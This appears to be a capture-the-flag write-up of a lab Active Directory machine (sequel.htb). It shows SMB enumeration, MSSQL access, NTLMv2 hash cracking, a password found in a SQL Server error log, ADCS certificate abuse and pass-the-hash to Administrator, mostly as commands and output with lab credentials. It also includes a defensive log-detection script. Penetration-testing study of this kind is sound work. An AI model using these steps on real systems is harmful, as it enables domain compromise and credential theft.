```
[~] The config file is expected to be at "/root/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.10.11.202:53
Open 10.10.11.202:88
Open 10.10.11.202:135
Open 10.10.11.202:139
Open 10.10.11.202:389
Open 10.10.11.202:445
Open 10.10.11.202:464
Open 10.10.11.202:593
Open 10.10.11.202:636
Open 10.10.11.202:1433
Open 10.10.11.202:3269
Open 10.10.11.202:3268
Open 10.10.11.202:5985
Open 10.10.11.202:9389
Open 10.10.11.202:49667
Open 10.10.11.202:49689
Open 10.10.11.202:49690
Open 10.10.11.202:49712
Open 10.10.11.202:49724
Open 10.10.11.202:49727
```
SMB information gathering
Try anonymous access with smbclient
```
smbclient -L //10.10.11.202
Password for [WORKGROUP\root]:

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share
	Public          Disk
	SYSVOL          Disk      Logon server share
```
Anonymous access is allowed.
```
smbclient //10.10.11.202/Public
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Nov 19 19:51:25 2022
  ..                                  D        0  Sat Nov 19 19:51:25 2022
  SQL Server Procedures.pdf           A    49551  Fri Nov 18 21:39:43 2022

		5184255 blocks of size 4096. 1449739 blocks available
smb: \>
```
```
impacket-mssqlclient PublicUser:GuestUserCantWrite1@10.10.11.202
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC\SQLMOCK): Line 1: Changed database context to 'master'.
[*] INFO(DC\SQLMOCK): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (PublicUser  guest@master)>
```
Try executing a command through xp_cmdshell
```
SQL (PublicUser  guest@master)> xp_cmdshell whoami
ERROR(DC\SQLMOCK): Line 1: The EXECUTE permission was denied on the object 'xp_cmdshell', database 'mssqlsystemresource', schema 'sys'.
```
```
john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
REGGIE1234ronnie (sql_svc)
1g 0:00:00:17 DONE (2025-03-19 20:46) 0.05656g/s 605248p/s 605248c/s 605248C/s REINLY..REDMAN69
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
```
```
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         2/7/2023   8:58 AM                Administrator
d-r---        7/20/2021  12:23 PM                Public
d-----         2/1/2023   6:37 PM                Ryan.Cooper
d-----         2/7/2023   8:10 AM                sql_svc
```
There is another user, Ryan.Cooper.
```
*Evil-WinRM* PS C:\SQLServer\Logs> ls

    Directory: C:\SQLServer\Logs

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         2/7/2023   8:06 AM          27608 ERRORLOG.BAK
```
This directory holds a backup of the SQL Server error log; view it with type.
```
2022-11-18 13:43:07.44 Logon       Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.44 Logon       Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon       Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon       Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.72 spid51      Attempting to load library 'xpstar.dll' into memory. This is an informational message only. No user action is required.
2022-11-18 13:43:07.76 spid51      Using 'xpstar.dll' version '2019.150.2000' to execute extended stored procedure 'xp_sqlagent_is_starting'. This is an informational message only; no user action is required.
2022-11-18 13:43:08.24 spid51      Changed database context to 'master'.
```
At the end of the log is Ryan.Cooper's password: the failed logon for user 'NuclearMosquito3', recorded right after the failed logon for sequel.htb\Ryan.Cooper from the same client, shows the password was typed into the username field.
```
username: Ryan.Cooper
password: NuclearMosquito3
```
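A defender can hunt for exactly this mistake in SQL Server ERRORLOG files. The following detection script is an added example, not part of the original writeup: it parses the 18456 "Logon failed" lines in the format shown above and flags a failed logon whose "user" is not a domain-qualified account when it follows, from the same client within a short window, a failed logon for a real domain account. The sample log lines and the names in them are constructed placeholders; the suspect string is masked in the report so the finding itself does not leak a password.

```python
import re
from datetime import datetime, timedelta

# Matches SQL Server ERRORLOG "Logon failed" lines in the format shown in the log above.
LOGON_FAIL = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{2})\s+Logon\s+"
    r"Logon failed for user '(?P<user>[^']*)'\. Reason: (?P<reason>.*?) "
    r"\[CLIENT: (?P<client>[^\]]+)\]$"
)
# DOMAIN\name or name@domain: the shapes a deliberately typed account name takes.
DOMAIN_QUALIFIED = re.compile(r"^[^\\@]+\\[^\\@]+$|^[^\\@]+@[^\\@]+$")


def parse_failures(lines):
    """Yield (timestamp, user, client) for every failed-logon line."""
    for line in lines:
        m = LOGON_FAIL.match(line.strip())
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f")
            yield ts, m["user"], m["client"]


def find_swapped_credentials(lines, window=timedelta(seconds=2)):
    """Flag an unqualified 'user' that fails right after a domain account fails
    from the same client: the signature of a password typed into the username box."""
    findings, last_by_client = [], {}
    for ts, user, client in parse_failures(lines):
        prev = last_by_client.get(client)
        if prev and not DOMAIN_QUALIFIED.match(user) and ts - prev[0] <= window:
            masked = user[:1] + "*" * (len(user) - 1)   # never report the secret itself
            findings.append({"time": ts, "account": prev[1], "client": client,
                             "suspect": masked, "length": len(user)})
        if DOMAIN_QUALIFIED.match(user):
            last_by_client[client] = (ts, user)
    return findings


# Constructed sample in the ERRORLOG format above (placeholder domain, users and client IPs).
SAMPLE_LOG = """\
2022-11-18 13:43:07.44 Logon       Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.44 Logon       Logon failed for user 'corp.example\\j.doe'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon       Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon       Logon failed for user 'Winter2022!'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:50:01.10 Logon       Logon failed for user 'corp.example\\svc_backup'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.5]
""".splitlines()

if __name__ == "__main__":
    for f in find_swapped_credentials(SAMPLE_LOG):
        print(f"{f['time']} client={f['client']} account={f['account']} "
              f"suspect={f['suspect']} ({f['length']} chars)")
```

The same logic applies to the Windows Security log (event 4625) and to any service that logs failed usernames verbatim; restricting who can read ERRORLOG backups on disk is the matching mitigation.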
Verify the credentials with netexec
```
netexec winrm 10.10.11.202 -u Ryan.Cooper -p NuclearMosquito3
WINRM       10.10.11.202    5985   DC               [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:sequel.htb)
WINRM       10.10.11.202    5985   DC               [+] sequel.htb\Ryan.Cooper:NuclearMosquito3 (Pwn3d!)
```
```
[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Trying to connect to endpoint: ncacn_np:10.10.11.202[\pipe\cert]
[+] Connected to endpoint: ncacn_np:10.10.11.202[\pipe\cert]
[*] Successfully requested certificate
[*] Request ID is 12
[*] Got certificate with UPN 'Administrator'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
```
First synchronise the clock with the DC
```
ntpdate -s sequel.htb
```
Continue the attack
```
certipy-ad auth -pfx administrator.pfx -username Administrator -domain sequel.htb -dc-ip 10.10.11.202 -debug
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@sequel.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5e17e1e9f3e58f4ee
```
That yields the Administrator NT hash; use netexec to check whether it works for a WinRM connection.
```
netexec winrm 10.10.11.202 -u administrator -H aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5e17e1e9f3e58f4ee
WINRM       10.10.11.202    5985   DC               [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:sequel.htb)
WINRM       10.10.11.202    5985   DC               [+] sequel.htb\administrator:a52f78e4c751e5f5e17e1e9f3e58f4ee (Pwn3d!)
```